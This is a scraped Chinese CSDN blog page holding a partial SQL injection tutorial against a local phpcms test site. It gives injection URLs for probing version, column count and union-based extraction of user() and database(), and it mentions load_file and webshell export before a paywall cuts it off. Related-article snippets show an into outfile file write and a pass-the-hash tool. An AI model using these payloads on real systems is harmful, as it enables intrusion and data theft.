mysql 普通用户 注入_Mysql注入初体验 Root权限下注入及普通用户利用系统表的注入...

最新推荐文章于 2022-07-31 17:15:58 发布
最新推荐文章于 2022-07-31 17:15:58 发布
阅读量295 收藏 1
点赞数
文章标签: mysql 普通用户 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32095133/article/details/113644879
版权

测试环境为win7sp1+iis7.5+mysql5.1,目标为一个小型phpcms网站,存在注入的地址为http://127.0.0.1:8080/show.php?id=2

一.        Root权限下的mysql注入

直接在网址后面添加引号http://127.0.0.1:8080/show.php?id=2'

直接爆出为Mysql数据库,使用xor 1=1 xor 1=2确定为整数型注入;

确定mysql版本号,提交http://127.0.0.1:8080/show.php?id=2 and ord(mid(version(),1,1))>51,返回正确,版本大于5.1,支持union查询;

使用order by 确认字段数,15时正确,16时错误,得出字段长度为15;

显示字段位置http://127.0.0.1:8080/show.php?id=2 and 1<1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,显示出3和11位置

现在我们来确认当前用户权限,提交http://127.0.0.1:8080/show.php?id=2 and 1<1 union select 1,2,user(),4,5,6,7,8,9,10,database(),12,13,14,15

是root权限哦,从root@localhost可以看出当前网站和数据库是位于同一台机器上的,当然我们是在自己的电脑上测试的

既然是root权限,而且是整形注入,我们就可以load_file()了,也可以导出webshell了,我们在3,或11的位置显示load_

最低0.47元/天 解锁文章
童雅洋梨
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux_mysql.rar_c mysql linux_linux mysql_linux mysql_linux m
09-21
同时,安全也是不可忽视的部分,包括使用参数化查询防止SQL注入,限制用户权限,定期备份数据库等。 总之,Linux下的数据库编程涉及了对MySQL服务器的管理和C语言接口的运用,这对于任何需要在Linux环境中处理数据...
mysql load file 权限_Mysql 命令 load data infile 权限问题
weixin_35878683的博客
01-19 1019
【1】Mysql命令load data infile 执行权限问题工作中,经常会遇到往线上环境mysql数据库批量导入源数据的场景。针对这个场景问题,mysql有一个很高效的命令:load data infile通过load data infile命令将data_file文件数据导入中。当然,因为mysql数据库权限限制的问题,分为以下几种情况:(1)root用户(特指mysqlroot,非L...
mysql必须用root用户装_Mysql 5.7.13 非root用户安装与配置
weixin_33925126的博客
02-18 910
Mysql 5.7.13 非root用户安装与配置常用软件,MySQL,运维 2018-07-10 106 0正文一.概览1.1.准备软件mysql-5.7.13-linux-glibc2.5-x86_64.tar.gz二.安装2.1.安装Mysql解压安装包到指定位置:tar zxvf mysql-5.7.13-linux-glibc2.5-x86_64.tar.gz建立软连接方面记录:ln -...
mysql 注入
qq_58970968的博客
07-31 1941
同一个服务器下的不同网站之间的数据库用户有可能是不同的,如果a网站可以有SQL注入,他的用户是root的话就可以实现跨站数据库入侵,去查看网站b下面的数据库;unionselect1,'x',3intooutfile'D\\x.php'--+写入文件‘x’到x.php中;当magic_quotes_gpc=On时,输入数据中含单引号(’)、双引号(”)、反斜线(\)与NULL(NULL字符)等字符,都会被加上反斜线;用来读取数据库下的文件;...
mysql怎么查询当前登录的用户
热门推荐
digitalkee的博客
06-03 1万+
mysql如何显示当前登录用户
Mysql注入初体验 Root权限注入普通用户利用系统注入
weixin_34202952的博客
03-03 221
测试环境为win7sp1+iis7.5+mysql5.1,目标为一个小型phpcms网站,存在注入的地址为http://127.0.0.1:8080/show.php?id=2 一. Root权限下的mysql注入 直接在网址后面添加引号http://127.0.0.1:8080/show.php?id=2' 直接爆出为Mysql数据库,使用xo...
mysql.data.dll v4.0
02-20
MySQL.data.dll v4.0是MySQL数据库连接器的一个重要组件,它是.NET Framework应用程序与MySQL数据库进行交互的关键。这个DLL文件提供了必要的接口和功能,使得开发人员可以使用C#、VB.NET或其他.NET支持的语言来访问...
史上最完整最全的MySQL注入教程.docx
11-25
- **MySQL Root权限**:如果能获取到root权限,攻击者可以执行更广泛的操作,甚至关闭MySQL服务器。 ### 7. 防御策略 为了防止SQL注入,开发者应遵循以下最佳实践: - 使用参数化查询或预编译语句,如PHP的PDO或...
mysql.data.dll +教程
07-05
3. 安全性:如何设置用户权限,防止SQL注入等安全问题。 4. 性能优化:索引的使用、查询优化、事务处理等。 5. 错误处理和调试:如何处理连接丢失、查询失败等问题。 记得在实际项目中,你可能还需要处理多线程、...
JEECMSx1.8.0_mysql_ROOT.zip
03-19
在JEECMS中,MySQL用于存储网站内容、用户信息、权限设置等数据。可能使用的数据库特性包括: 1. **索引**:提升数据查询速度。 2. **事务处理**:确保数据一致性,支持并发操作。 3. **存储过程和触发器**:提高...
sql注入mysql权限问题
不想当脚本小子的脚本小子
02-13 408
有道云笔记链接:http://note.youdao.com/noteshare?id=0e4d59cda87bd2e8d2a864b1aa0e3210&sub=A8D1F4C0629B4A5ABAF405920ADD10E4
mysql注入添加root_sql注入入门 之 mysql root权限下的注入利用方式
weixin_31049801的博客
01-20 270
1,mysql root权限,实例注入点,如下:http://vuln.com/news_view.php?id=9&vid=1922,尝试用单引号去干扰vid参数,http://vuln.com/news_view.php?id=9&vid=192'3,尝试闭合http://vuln.com/news_view.php?id=9&vid=192 and 1=112 条件为...
mysql注入
weixin_34365417的博客
04-08 3464
1、简介   1.1、SQL注入的本质   web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,黑客可以利用该漏洞执行任意SQL语句.      1.2、什么是SQL注入   1.是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击   2.这些参数传递给后台的SQL数据库服务器加以解析并执行. ...
Sql注入_mysql权限入侵
weixin_30342827的博客
03-22 520
实验:测试不同数据库用户的操作权限 文件读写测试:load_file() ,into outfile 数据库用户账号密码存储在mysql.user下 Mysql最高权限用户rootMysql普通权限用户test: 无权限文件读写 注入点数据库用户权限由什么决定? 连接数据库用户决定 Mysql注入点进行文件读写操作: 条件:root权限注入...
使用wce进行本地和域的hash注入
weixin_30455661的博客
08-16 377
wce是与gethashes 和mimikatz齐名的一款hash管理工具,具体的作用应该不需要我多说 wce已经更新到1.4下载地址如下 http://www.ampliasecurity.com/research/wce_v1_4beta_x32.zip http://www.ampliasecurity.com/research/wce_v1_4beta_x64.zip http:/...
mysql手工注入技巧_MySQL数据库手工注入技巧
weixin_31303743的博客
01-19 340
MySQL数据库的注入很复杂、很精彩,完全是Access不能比的。因为MySQL注入很灵活了,完全不像Access那样死板固定,我感觉Access的注入完全是靠人品,或者可以说,谁的名、列名字典大,谁的成功率就大。根据我对MySQL的认识,注入时,基本可以通过爆、盲注、报错三种方式获得用户名和密码,在权限足够的情况下,还可以直接通过SQL语句插入并导出我们的一句话webshell。当拿到一个M...
mysql看当前用户有哪些权限_mysql查看当前用户权限
weixin_42322467的博客
01-30 1521
13.7.5.17SHOW GRANTS SyntaxSHOW GRANTS [FOR user]This statement displays theGRANTstatement or statements that must be issued to duplicate the privileges that are granted to a MySQL user account.SH...
mysql root 注入_Mysql注入root权限直接写一句话马
weixin_28998851的博客
01-18 167
首先我们的找到一个有注入的站:这里我用自己搭建的环境示;大家不要乱来http://localhost/pentest/sql/sql_injection_get.php?id=1发现是root权限,我们尝试直接写马首先要找到网站的主目录:数据库目录:D:\wamp\bin\mysql\mysql5.5.20\data\进行判断,服务器可能为wampserver简易版,httpd.conf文件在D...
面试.pdf
最新发布
07-02
1. **MySQL注入与Shell植入**: - 使用`SELECT`语句的`INTO OUTFILE`特性,可以将恶意代码写入文件系统,如`SELECT 'payload' INTO OUTFILE '/path/to/webshell'`。这需要满足两个条件: - 知道绝对路径,比如`/...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值